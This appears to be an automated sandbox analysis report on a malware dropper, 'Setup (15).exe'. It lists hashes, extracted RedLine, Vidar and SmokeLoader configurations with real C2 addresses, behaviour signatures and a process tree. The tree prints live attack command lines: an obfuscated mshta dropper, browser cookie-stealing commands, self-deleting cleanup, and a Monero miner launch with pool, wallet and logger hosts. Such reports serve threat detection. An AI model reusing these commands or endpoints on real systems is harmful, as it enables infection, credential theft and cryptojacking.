Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    262s
  • max time network
    1815s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 12:53

General

  • Target

    Setup (15).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 10 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 24 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 11 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 14 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 33 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 14 IoCs
  • Modifies registry class 19 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 23 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 10 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2632
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2624
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
        • Suspicious use of SetThreadContext
        • Modifies registry class
        PID:2536
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k SystemNetworkService
          2⤵
          • Drops file in System32 directory
          • Checks processor information in registry
          • Modifies data under HKEY_USERS
          • Modifies registry class
          PID:5912
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2376
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2336
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1824
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1368
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1260
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1236
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:964
                      • C:\Users\Admin\AppData\Roaming\hjusajb
                        C:\Users\Admin\AppData\Roaming\hjusajb
                        2⤵
                          PID:8108
                        • C:\Users\Admin\AppData\Roaming\ebusajb
                          C:\Users\Admin\AppData\Roaming\ebusajb
                          2⤵
                            PID:9112
                          • C:\Users\Admin\AppData\Roaming\ctusajb
                            C:\Users\Admin\AppData\Roaming\ctusajb
                            2⤵
                              PID:6248
                          • c:\windows\system32\svchost.exe
                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                            1⤵
                              PID:1008
                            • C:\Users\Admin\AppData\Local\Temp\Setup (15).exe
                              "C:\Users\Admin\AppData\Local\Temp\Setup (15).exe"
                              1⤵
                              • Checks computer location settings
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:3972
                              • C:\Users\Admin\Documents\NoKnFfhnVtEzqe7TByLc6EMy.exe
                                "C:\Users\Admin\Documents\NoKnFfhnVtEzqe7TByLc6EMy.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3076
                              • C:\Users\Admin\Documents\WPwoRWj25MjvbYYZNV_QLRPq.exe
                                "C:\Users\Admin\Documents\WPwoRWj25MjvbYYZNV_QLRPq.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:3100
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3100 -s 484
                                  3⤵
                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                  • Program crash
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4848
                              • C:\Users\Admin\Documents\QKRU9R5Qj6SGtEF6b445n7_I.exe
                                "C:\Users\Admin\Documents\QKRU9R5Qj6SGtEF6b445n7_I.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                PID:3092
                                • C:\Users\Admin\Documents\QKRU9R5Qj6SGtEF6b445n7_I.exe
                                  "C:\Users\Admin\Documents\QKRU9R5Qj6SGtEF6b445n7_I.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:592
                              • C:\Users\Admin\Documents\NNpzY6gN7yUG8LZm1hkUC7D6.exe
                                "C:\Users\Admin\Documents\NNpzY6gN7yUG8LZm1hkUC7D6.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:856
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 388
                                  3⤵
                                  • Program crash
                                  PID:3740
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 368
                                  3⤵
                                  • Program crash
                                  PID:5312
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 404
                                  3⤵
                                  • Program crash
                                  PID:5524
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 596
                                  3⤵
                                  • Program crash
                                  PID:5876
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 660
                                  3⤵
                                  • Program crash
                                  PID:5864
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 696
                                  3⤵
                                  • Program crash
                                  PID:5168
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 568
                                  3⤵
                                  • Program crash
                                  PID:1276
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 856 -s 708
                                  3⤵
                                  • Program crash
                                  PID:4424
                                • C:\Users\Admin\Documents\NNpzY6gN7yUG8LZm1hkUC7D6.exe
                                  "C:\Users\Admin\Documents\NNpzY6gN7yUG8LZm1hkUC7D6.exe"
                                  3⤵
                                    PID:9240
                                • C:\Users\Admin\Documents\EUW_c7TXaKp_tmUDLcysxwVA.exe
                                  "C:\Users\Admin\Documents\EUW_c7TXaKp_tmUDLcysxwVA.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Checks BIOS information in registry
                                  • Checks whether UAC is enabled
                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:488
                                • C:\Users\Admin\Documents\OYGbU4oFa943XZcQvSSIvyr0.exe
                                  "C:\Users\Admin\Documents\OYGbU4oFa943XZcQvSSIvyr0.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4048
                                  • C:\Users\Admin\Documents\OYGbU4oFa943XZcQvSSIvyr0.exe
                                    C:\Users\Admin\Documents\OYGbU4oFa943XZcQvSSIvyr0.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4744
                                • C:\Users\Admin\Documents\skBgq9nx6MkVkJFLhZlJe7qV.exe
                                  "C:\Users\Admin\Documents\skBgq9nx6MkVkJFLhZlJe7qV.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Adds Run key to start application
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:428
                                  • C:\Users\Admin\Documents\WriteJoin\EUW_c7TXaKp_tmUDLcysxwVA.exe
                                    "C:\Users\Admin\Documents\WriteJoin\EUW_c7TXaKp_tmUDLcysxwVA.exe"
                                    3⤵
                                      PID:8612
                                  • C:\Users\Admin\Documents\G7E1hd_bZx3uJhfELJ8ScYpg.exe
                                    "C:\Users\Admin\Documents\G7E1hd_bZx3uJhfELJ8ScYpg.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    PID:2356
                                    • C:\Users\Admin\AppData\Roaming\7129293.exe
                                      "C:\Users\Admin\AppData\Roaming\7129293.exe"
                                      3⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3980
                                    • C:\Users\Admin\AppData\Roaming\6545014.exe
                                      "C:\Users\Admin\AppData\Roaming\6545014.exe"
                                      3⤵
                                        PID:652
                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                          4⤵
                                          • Executes dropped EXE
                                          PID:4508
                                      • C:\Users\Admin\AppData\Roaming\7382435.exe
                                        "C:\Users\Admin\AppData\Roaming\7382435.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4636
                                      • C:\Users\Admin\AppData\Roaming\6379446.exe
                                        "C:\Users\Admin\AppData\Roaming\6379446.exe"
                                        3⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4524
                                    • C:\Users\Admin\Documents\8YSyM9ayrOVtzqPrOMes0s2t.exe
                                      "C:\Users\Admin\Documents\8YSyM9ayrOVtzqPrOMes0s2t.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      PID:2076
                                    • C:\Users\Admin\Documents\cfByq4Zn8qqhK_PmmC02tybf.exe
                                      "C:\Users\Admin\Documents\cfByq4Zn8qqhK_PmmC02tybf.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2612
                                    • C:\Users\Admin\Documents\GIyVo79eh5b4LFbdXR2xfaj5.exe
                                      "C:\Users\Admin\Documents\GIyVo79eh5b4LFbdXR2xfaj5.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Checks BIOS information in registry
                                      • Checks whether UAC is enabled
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1400
                                    • C:\Users\Admin\Documents\xq_moO1V05HZxqk7LcrCMHVn.exe
                                      "C:\Users\Admin\Documents\xq_moO1V05HZxqk7LcrCMHVn.exe"
                                      2⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3288
                                      • C:\Users\Admin\Documents\xq_moO1V05HZxqk7LcrCMHVn.exe
                                        "C:\Users\Admin\Documents\xq_moO1V05HZxqk7LcrCMHVn.exe"
                                        3⤵
                                          PID:5732
                                      • C:\Users\Admin\Documents\0fheL06L9upfkyC2scdiNv7U.exe
                                        "C:\Users\Admin\Documents\0fheL06L9upfkyC2scdiNv7U.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3264
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 3264 -s 480
                                          3⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4992
                                      • C:\Users\Admin\Documents\24EV_N_pRUmIs9XEKnQrJ6sD.exe
                                        "C:\Users\Admin\Documents\24EV_N_pRUmIs9XEKnQrJ6sD.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:2760
                                        • C:\Users\Admin\Documents\24EV_N_pRUmIs9XEKnQrJ6sD.exe
                                          C:\Users\Admin\Documents\24EV_N_pRUmIs9XEKnQrJ6sD.exe
                                          3⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:4704
                                      • C:\Users\Admin\Documents\HL1HFO7St_5UaRmPmnWS92sE.exe
                                        "C:\Users\Admin\Documents\HL1HFO7St_5UaRmPmnWS92sE.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:188
                                      • C:\Users\Admin\Documents\tRArbptVtyVOINQAZBNrYmMx.exe
                                        "C:\Users\Admin\Documents\tRArbptVtyVOINQAZBNrYmMx.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:4076
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "tRArbptVtyVOINQAZBNrYmMx.exe" /f & erase "C:\Users\Admin\Documents\tRArbptVtyVOINQAZBNrYmMx.exe" & exit
                                          3⤵
                                            PID:5932
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "tRArbptVtyVOINQAZBNrYmMx.exe" /f
                                              4⤵
                                              • Kills process with taskkill
                                              PID:4432
                                        • C:\Users\Admin\Documents\5moR9upkoFxFr02UHXOQm_Z0.exe
                                          "C:\Users\Admin\Documents\5moR9upkoFxFr02UHXOQm_Z0.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Checks BIOS information in registry
                                          • Checks whether UAC is enabled
                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1744
                                        • C:\Users\Admin\Documents\97ZOHO1SBw1ntTWI7uDD_e0W.exe
                                          "C:\Users\Admin\Documents\97ZOHO1SBw1ntTWI7uDD_e0W.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:1348
                                          • C:\Users\Admin\Documents\97ZOHO1SBw1ntTWI7uDD_e0W.exe
                                            "C:\Users\Admin\Documents\97ZOHO1SBw1ntTWI7uDD_e0W.exe" -q
                                            3⤵
                                            • Executes dropped EXE
                                            PID:3668
                                        • C:\Users\Admin\Documents\lIGDft3eNFlkRbQyERX1cCgD.exe
                                          "C:\Users\Admin\Documents\lIGDft3eNFlkRbQyERX1cCgD.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          • Suspicious use of WriteProcessMemory
                                          PID:3080
                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Drops startup file
                                            PID:4216
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                              4⤵
                                              • Executes dropped EXE
                                              PID:2256
                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                                PID:4648
                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                4⤵
                                                  PID:5396
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5456
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:4164
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5272
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  4⤵
                                                  • Executes dropped EXE
                                                  PID:5396
                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                  4⤵
                                                    PID:5100
                                                • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Checks whether UAC is enabled
                                                  • Drops file in Program Files directory
                                                  PID:4252
                                                • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                  "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  PID:4296
                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    4⤵
                                                      PID:2256
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                      • Executes dropped EXE
                                                      PID:4700
                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                      4⤵
                                                        PID:8908
                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                        4⤵
                                                          PID:9708
                                                    • C:\Users\Admin\Documents\k5bFpVBcj2hUpLQiuG90ZQUB.exe
                                                      "C:\Users\Admin\Documents\k5bFpVBcj2hUpLQiuG90ZQUB.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:2496
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 660
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4620
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 712
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4936
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 708
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1380
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 708
                                                        3⤵
                                                        • Program crash
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3624
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2496 -s 1060
                                                        3⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1872
                                                    • C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe
                                                      "C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:512
                                                      • C:\Windows\SysWOW64\mshta.exe
                                                        "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\zWbZXulAXiAVOGwVGxeGjkjW.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                                        3⤵
                                                          PID:4356
                                                      • C:\Users\Admin\Documents\OssAnZCvw8neLzNEgVJrc3ya.exe
                                                        "C:\Users\Admin\Documents\OssAnZCvw8neLzNEgVJrc3ya.exe"
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:3920
                                                      • C:\Users\Admin\Documents\SnZwByt_ntYYmomBDNqsydJb.exe
                                                        "C:\Users\Admin\Documents\SnZwByt_ntYYmomBDNqsydJb.exe"
                                                        2⤵
                                                          PID:4788
                                                          • C:\Users\Admin\AppData\Local\Temp\is-HN39C.tmp\SnZwByt_ntYYmomBDNqsydJb.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-HN39C.tmp\SnZwByt_ntYYmomBDNqsydJb.tmp" /SL5="$2021C,138429,56832,C:\Users\Admin\Documents\SnZwByt_ntYYmomBDNqsydJb.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:4968
                                                            • C:\Users\Admin\AppData\Local\Temp\is-376MF.tmp\Setup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-376MF.tmp\Setup.exe" /Verysilent
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:5772
                                                              • C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
                                                                "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                • Checks processor information in registry
                                                                PID:5960
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im runvd.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe" & del C:\ProgramData\*.dll & exit
                                                                  6⤵
                                                                    PID:8008
                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                      taskkill /im runvd.exe /f
                                                                      7⤵
                                                                      • Kills process with taskkill
                                                                      PID:7884
                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                      timeout /t 6
                                                                      7⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:8508
                                                                • C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:5944
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-7K5D8.tmp\Stats.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-7K5D8.tmp\Stats.tmp" /SL5="$301F2,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
                                                                    6⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    PID:6072
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-8EEDP.tmp\builder.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-8EEDP.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
                                                                      7⤵
